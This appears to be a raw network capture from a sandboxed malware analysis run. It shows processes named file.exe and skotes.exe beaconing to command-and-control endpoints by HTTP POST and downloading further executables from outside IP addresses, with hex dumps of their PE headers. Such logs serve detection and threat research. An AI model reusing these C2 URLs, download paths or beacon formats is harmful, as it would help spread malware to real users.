Dec 7, 2024 12:59:59.173907042 CET	1236	IN	Data Raw: a8 36 2d 51 13 ad 1f a8 b2 4b 93 a4 2f 60 6d 38 56 14 19 51 8e d2 fd da 36 48 5a 64 13 d5 4d 9d 16 ad 77 f8 56 b0 1f 25 c0 f9 6c 24 c0 f9 6c 24 c0 f9 6c 24 c0 42 93 45 ba 38 09 e7 49 b1 56 5e 87 b2 d4 51 43 d5 cd 61 16 ad 9a 1d 08 a3 d5 59 14 21 Data Ascii: 6-QK/`m8VQ6HZdMwV%l$l$l$BE8IV^QCaY!CpJZ\BEqQ}EpCmss}'QQ$6Ar@#9QraI9DQr`IQV'"9MQByz`KQ0Z}n0q
Dec 7, 2024 12:59:59.291177988 CET	1236	IN	Data Raw: 92 0f 19 51 8e d2 fd 12 2c 91 90 50 13 30 54 5c 97 ed 85 5c 2b 5c a9 50 13 30 0c 58 80 72 70 e5 cf 7d 70 aa 19 ac 1f 38 e9 a3 1f 51 c0 f9 6c 24 c0 43 9b 27 13 dd 2f 10 a5 b1 ed cc 08 38 29 56 46 b1 92 1f b2 f0 6c 24 c0 f9 6c 24 c0 f9 6c 24 c0 32 Data Ascii: Q,P0T\\+\P0Xrp}p8Ql$C'/8)VFl$l$l$2Q8(l$BErP8"!CpJZ\l$l$l$BErW^/QsI"YQ+P:9Q,JQJUQJZ\l$l$C@s"}pQ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49845	185.215.113.206	80	6564	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Dec 7, 2024 13:00:04.880712986 CET	474	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDGHJEHJJDAAAKEBGCFC Host: 185.215.113.206 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 63 35 64 64 35 36 64 31 35 37 66 63 30 64 34 37 31 64 61 39 66 39 33 36 35 63 38 38 33 33 66 30 36 33 63 61 35 33 64 37 39 64 33 62 34 30 34 65 34 31 36 38 31 35 64 34 35 30 38 36 32 36 33 36 61 39 63 38 66 62 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 2d 2d 0d 0a Data Ascii: ------GDGHJEHJJDAAAKEBGCFCContent-Disposition: form-data; name="token"0cc5dd56d157fc0d471da9f9365c8833f063ca53d79d3b404e416815d450862636a9c8fb------GDGHJEHJJDAAAKEBGCFCContent-Disposition: form-data; name="message"wkkjqaiaxkhb------GDGHJEHJJDAAAKEBGCFC--
Dec 7, 2024 13:00:06.733577967 CET	203	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:06 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49904	185.215.113.43	80	6952	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 7, 2024 13:00:33.418903112 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 7, 2024 13:00:34.762979984 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 07 Dec 2024 12:00:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49913	185.215.113.43	80	6952	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 7, 2024 13:00:36.395751953 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 7, 2024 13:00:37.744368076 CET	668	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 07 Dec 2024 12:00:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 64 64 0d 0a 20 3c 63 3e 31 30 31 32 39 33 33 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 39 63 32 64 63 62 31 38 31 34 65 65 30 61 62 36 31 35 31 37 30 33 34 34 39 33 38 38 63 31 31 31 38 38 62 61 39 61 35 35 33 36 65 36 23 31 30 31 32 39 34 32 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 65 37 65 37 62 39 63 61 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 31 32 39 34 33 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 38 65 36 62 31 63 61 37 32 64 64 35 33 34 64 62 30 35 37 65 62 34 31 30 61 34 39 34 64 39 64 23 31 30 31 32 39 34 34 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 [TRUNCATED] Data Ascii: 1dd <c>1012933001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fb9c2dcb1814ee0ab6151703449388c11188ba9a5536e6#1012942001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1012943001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1012944001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8fcf7b8c730804042ba5ce902415450#1012945001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49915	31.41.244.11	80	6952	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 7, 2024 13:00:37.979125023 CET	66	OUT	GET /files/7299809293/qk4EiZw.exe HTTP/1.1 Host: 31.41.244.11
Dec 7, 2024 13:00:39.306905031 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 07 Dec 2024 12:00:39 GMT Content-Type: application/octet-stream Content-Length: 1737216 Last-Modified: Sat, 07 Dec 2024 10:44:20 GMT Connection: keep-alive ETag: "67542704-1a8200" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 d5 1c 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 8c 00 00 00 08 00 00 00 00 00 00 00 e0 44 00 00 20 00 00 00 c0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 45 00 00 04 00 00 5e 6a 1b 00 02 00 40 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 e0 00 00 69 00 00 00 00 c0 00 00 34 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 e1 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELTgD @ E^j@Ui4 F @.rsrc4f@.idata l@ )n@kcsazwfy*p@epcrslpk DZ@.taggant@D"`@
Dec 7, 2024 13:00:39.307214975 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 7, 2024 13:00:39.307228088 CET	448	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 7, 2024 13:00:39.307679892 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 7, 2024 13:00:39.307694912 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 7, 2024 13:00:39.308342934 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 7, 2024 13:00:39.308355093 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 7, 2024 13:00:39.309137106 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 7, 2024 13:00:39.309149981 CET	1236	IN	Data Raw: a1 30 f4 7a 21 41 69 cf b4 50 6e 4f c9 02 48 09 5e c2 a7 7a 0c 57 96 84 a5 40 05 b1 09 6d 82 92 3d e8 35 60 64 52 80 ee 55 64 47 7c 0a 39 0b 5e 70 89 1e c0 1d 03 32 26 54 5b b1 5c 6c 8a 79 00 fe 5d e4 93 d4 9b 21 f0 17 11 66 a6 15 6e c2 97 90 38 Data Ascii: 0z!AiPnOH^zW@m=5`dRUdG\|9^p2&T[\ly]!fn8[?*J7njX@bpkA#oJUiayTf@DEjrwzy8AZ\|[\|r~p~I4aJS,!fTnP?w\gI~Kb0`W}#TH\|VY@rgvb
Dec 7, 2024 13:00:39.309911966 CET	1236	IN	Data Raw: d4 8d 86 4a 80 35 df c4 6b ac cc 6d 01 b8 cf fa 81 08 93 05 a0 46 c7 88 b1 5c 17 0a aa 62 01 c1 87 6b d8 4e 4f 50 d0 02 29 05 82 30 15 d3 38 70 8e 53 36 b9 b8 e1 1d 85 57 52 87 3f bd 8c 76 bb e1 71 bf 6a 9a 4c 60 d1 06 e9 9e 60 47 bd da 3f 21 63 Data Ascii: J5kmF\bkNOP)08pS6WR?vqjL``G?!c%yfV'o0lsaz^l>P<Nfd3%_NKfEbe@`q HQ}8a"nd%PB})Tu_51l;xH'4l<mpJl e
Dec 7, 2024 13:00:39.427089930 CET	1236	IN	Data Raw: e4 bd b2 15 25 8c 4e c1 05 a6 5b c6 75 99 63 9f d8 37 82 f6 65 74 e8 2a 0d 64 f4 39 0b 96 72 4b dd dc 46 4a 0c 2d 6b 2b 2e 67 3c 65 44 ae 7d 97 df 89 5e 2c 4b 97 e6 39 4f f0 72 b1 2b 51 b3 ac 35 87 9e 7f 8d cf c0 2f 05 70 f3 b3 0e 57 b5 58 2e b6 Data Ascii: %N[uc7et*d9rKFJ-k+.g<eD}^,K9Or+Q5/pWX.oh/D@IiO[\(hz?O`dkmnUoA"6U<PQ^6I#z9~Tb}}c8V_-`buKS9Ja[?c@wc1eo(=3;{_$/kybF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49932	185.215.113.43	80	6952	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 7, 2024 13:00:44.755578995 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 32 39 33 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1012933001&unit=246122658369
Dec 7, 2024 13:00:46.086766005 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 07 Dec 2024 12:00:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49936	185.215.113.16	80	6952	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 7, 2024 13:00:46.211344004 CET	55	OUT	GET /luma/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 7, 2024 13:00:47.587019920 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 07 Dec 2024 12:00:47 GMT Content-Type: application/octet-stream Content-Length: 1868288 Last-Modified: Sat, 07 Dec 2024 11:47:01 GMT Connection: keep-alive ETag: "675435b5-1c8200" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 62 af 50 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 c6 03 00 00 ac 00 00 00 00 00 00 00 70 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 4a 00 00 04 00 00 4c ab 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 30 05 00 70 00 00 00 00 20 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELbPgpJ@JL@\0p 1 2@.rsrc B@.idata 0F@ +@H@bqbljxfp @0J@lbyqfoff`J\@.taggant0pJ"`@
Dec 7, 2024 13:00:47.587227106 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 7, 2024 13:00:47.587239027 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 7, 2024 13:00:47.587968111 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 7, 2024 13:00:47.587982893 CET	1236	IN	Data Raw: cf 95 a1 66 db 40 6b 44 b3 3d fa 09 f9 70 6a 06 75 0d 43 4b 7d ae 1d 8e 4c 6e 5d 06 32 50 ea 95 fe 38 3c 6f 6d 3a 9e 7f f4 6c ca 4a e4 b4 a3 86 2e 05 7a 80 80 65 ee 89 b1 47 1f ad fc 21 a0 9f 39 b1 6c e9 b4 28 eb cd 55 42 cb d8 6c b3 5b 89 7b a5 Data Ascii: f@kD=pjuCK}Ln]2P8<om:lJ.zeG!9l(UBl[{_U]d=JI{.%["Wq\JmO@2n:cD0_)s;GgEuNajsrBf_5me'C%1}LWIL~>
Dec 7, 2024 13:00:47.588828087 CET	1236	IN	Data Raw: 0b 3e de 8d 8f 07 dd 9d be 67 ac ae 39 04 2e 3c 3c 6f 05 d7 c9 05 66 ad 8c bf b5 09 a6 66 f3 7d 3e dd 9a 95 95 40 36 09 1c 46 69 16 ec f1 ab 95 a7 92 60 1f ad 48 ea 40 1c 0d 1b 8a df 69 92 26 00 7a a2 14 7f ae bc e5 10 30 4d 98 8b 75 9a e8 43 aa Data Ascii: >g9.<<off}>@6Fi`H@i&z0MuC,t;MB~Pr*88#j^^f"ljp$m f.>U-qvnr^r.!nb4eruo}>8zZ3{])N.&Q{
Dec 7, 2024 13:00:47.588846922 CET	1236	IN	Data Raw: 76 93 8c 9f 72 28 7e 8c a1 fc a2 08 99 f7 99 73 ba 47 a0 7e 9b 48 82 99 31 05 ce bf 54 46 c5 85 8b db 35 1f 76 03 e5 aa eb 97 da 9d 0e 70 37 88 72 5c cf 50 f4 9f 1d ab 73 a9 7a 5e bf a5 25 66 dc fa ff 45 08 d4 7c 4b 9d 59 66 59 e9 9e 9f 26 6e 9f Data Ascii: vr(~sG~H1TF5vp7r\Psz^%fE\|KYfY&n9E;:zkp?uYp8%<4sPlEJE6~MUn@6#CDyJu<=XqiCr?fz.rcz]4vPe~h{h\|}=p0i;z=v<n>r
Dec 7, 2024 13:00:47.589574099 CET	1236	IN	Data Raw: d7 05 b9 75 c4 16 7f 3c 76 b8 89 3f e4 43 df 66 cc 1c 4e 81 e0 f5 e7 03 0f d2 ab 6d 9c 58 cd 10 5c 16 5d 5e 96 ed c8 33 bd 24 66 96 56 d6 e5 f8 26 30 06 be 5d 90 66 ab e3 ae 75 f8 76 3e e8 01 90 47 a8 70 81 24 35 e8 90 3c 6a b5 1a 5d 1f cd 8b be Data Ascii: u<v?CfNmX\]^3$fV&0]fuv>Gp$5<j]\.3YAp8@<(&:mh*~W[Z{6/;m g#fMlTb5JbeMs<\r#mY}>C!;}n/Z"H8r
Dec 7, 2024 13:00:47.589603901 CET	1236	IN	Data Raw: 85 ae db 6a ec de 6b 9b 24 b5 02 c3 22 9b 1b 62 69 c0 03 d8 75 ee 59 c8 fe da 93 e6 42 47 2b 3e 64 3a 5c 36 61 bd 1b 1d 9d 3f 6a 06 3c 2a 9c ff f3 71 6a ef 8b 91 2b fe 58 a0 dd 90 ff 0f 21 2a 65 21 e7 fd d5 05 9e 3a 70 e9 6a 39 2e c1 fa c2 f1 bc Data Ascii: jk$"biuYBG+>d:\6a?j<qj+X!e!:pj9."Pcalj-}u,zXReHElFjo6D0^ljMz_EY[oSb(bDZBW:*V8 [:E&nDwdpa:_v+T%?/;ZP
Dec 7, 2024 13:00:47.590370893 CET	1236	IN	Data Raw: c1 21 7b bc eb 40 aa fd dd 30 da cf 3b 5c 7e 76 f5 3f 9a b2 6a d8 e0 bf 9d 64 6a 31 ee 6c c4 d5 8f cf ae 11 4f b9 0e d0 c8 2e aa 9f fc 2c 84 61 15 20 6b 9f b3 8f 0c d4 d2 1c ec c7 a4 1c 7d db af 9c 24 00 42 5c 80 b4 dc de 5e c6 2c 32 ee 4d 6b 79 Data Ascii: !{@0;\~v?jdj1lO.,a k}$B\^,2MkyXyp8%\[legJAJF0oU^&@v"kYhql7keqP'9<GNEW0fR?}3=Uce7z!3ei:xjoOP2\}P;\|
Dec 7, 2024 13:00:47.707026005 CET	1236	IN	Data Raw: 80 9c b9 b5 a1 13 13 9d 77 07 80 cf c7 e4 e2 f5 db e3 f1 e9 a5 e4 9a e8 33 da 6e df 74 af 52 9d 33 70 45 17 9c 60 6c e9 98 7c 41 bc 32 30 5a f6 b3 a5 4d 7f 56 9f ca 4d 68 6b 58 af 6e ee 93 56 85 de cc 88 db dc e3 48 44 09 d1 91 68 5d fb 9c 74 ef Data Ascii: w3ntR3pE`l\|A20ZMVMhkXnVHDh]t%88FrZvb$\[FU78nd_l,ZO"#WE4[eK3p(bjUjq]IVd4Eq6HLuVK\|Xdfh\2pNI/!'z7

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49953	185.215.113.43	80	6952	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 7, 2024 13:00:53.098088026 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 32 39 34 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1012942001&unit=246122658369
Dec 7, 2024 13:00:54.438056946 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 07 Dec 2024 12:00:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49959	185.215.113.16	80	6952	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 7, 2024 13:00:54.562850952 CET	56	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 7, 2024 13:00:55.894624949 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 07 Dec 2024 12:00:55 GMT Content-Type: application/octet-stream Content-Length: 5277184 Last-Modified: Sat, 07 Dec 2024 11:47:10 GMT Connection: keep-alive ETag: "675435be-508600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce b4 e2 38 8a d5 8c 6b 8a d5 8c 6b 8a d5 8c 6b e5 a3 27 6b 92 d5 8c 6b e5 a3 12 6b 87 d5 8c 6b e5 a3 26 6b b0 d5 8c 6b 83 ad 0f 6b 89 d5 8c 6b 83 ad 1f 6b 88 d5 8c 6b 0a ac 8d 6a 89 d5 8c 6b 8a d5 8d 6b d6 d5 8c 6b e5 a3 23 6b 98 d5 8c 6b e5 a3 11 6b 8b d5 8c 6b 52 69 63 68 8a d5 8c 6b 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 3c e7 4a 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 98 02 00 00 22 01 00 00 00 00 00 00 90 50 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 c0 50 00 00 04 00 00 1a 09 51 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8kkk'kkkk&kkkkkkjkkk#kkkkRichkPEL<Jg"P@PQ@M$a$$ $$@.rsrc$$@.idata $$@amfccvoo+$+$@rdzlrlxpP`P@.taggant0P"dP@
Dec 7, 2024 13:00:55.895065069 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 7, 2024 13:00:55.895082951 CET	248	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 7, 2024 13:00:55.895495892 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
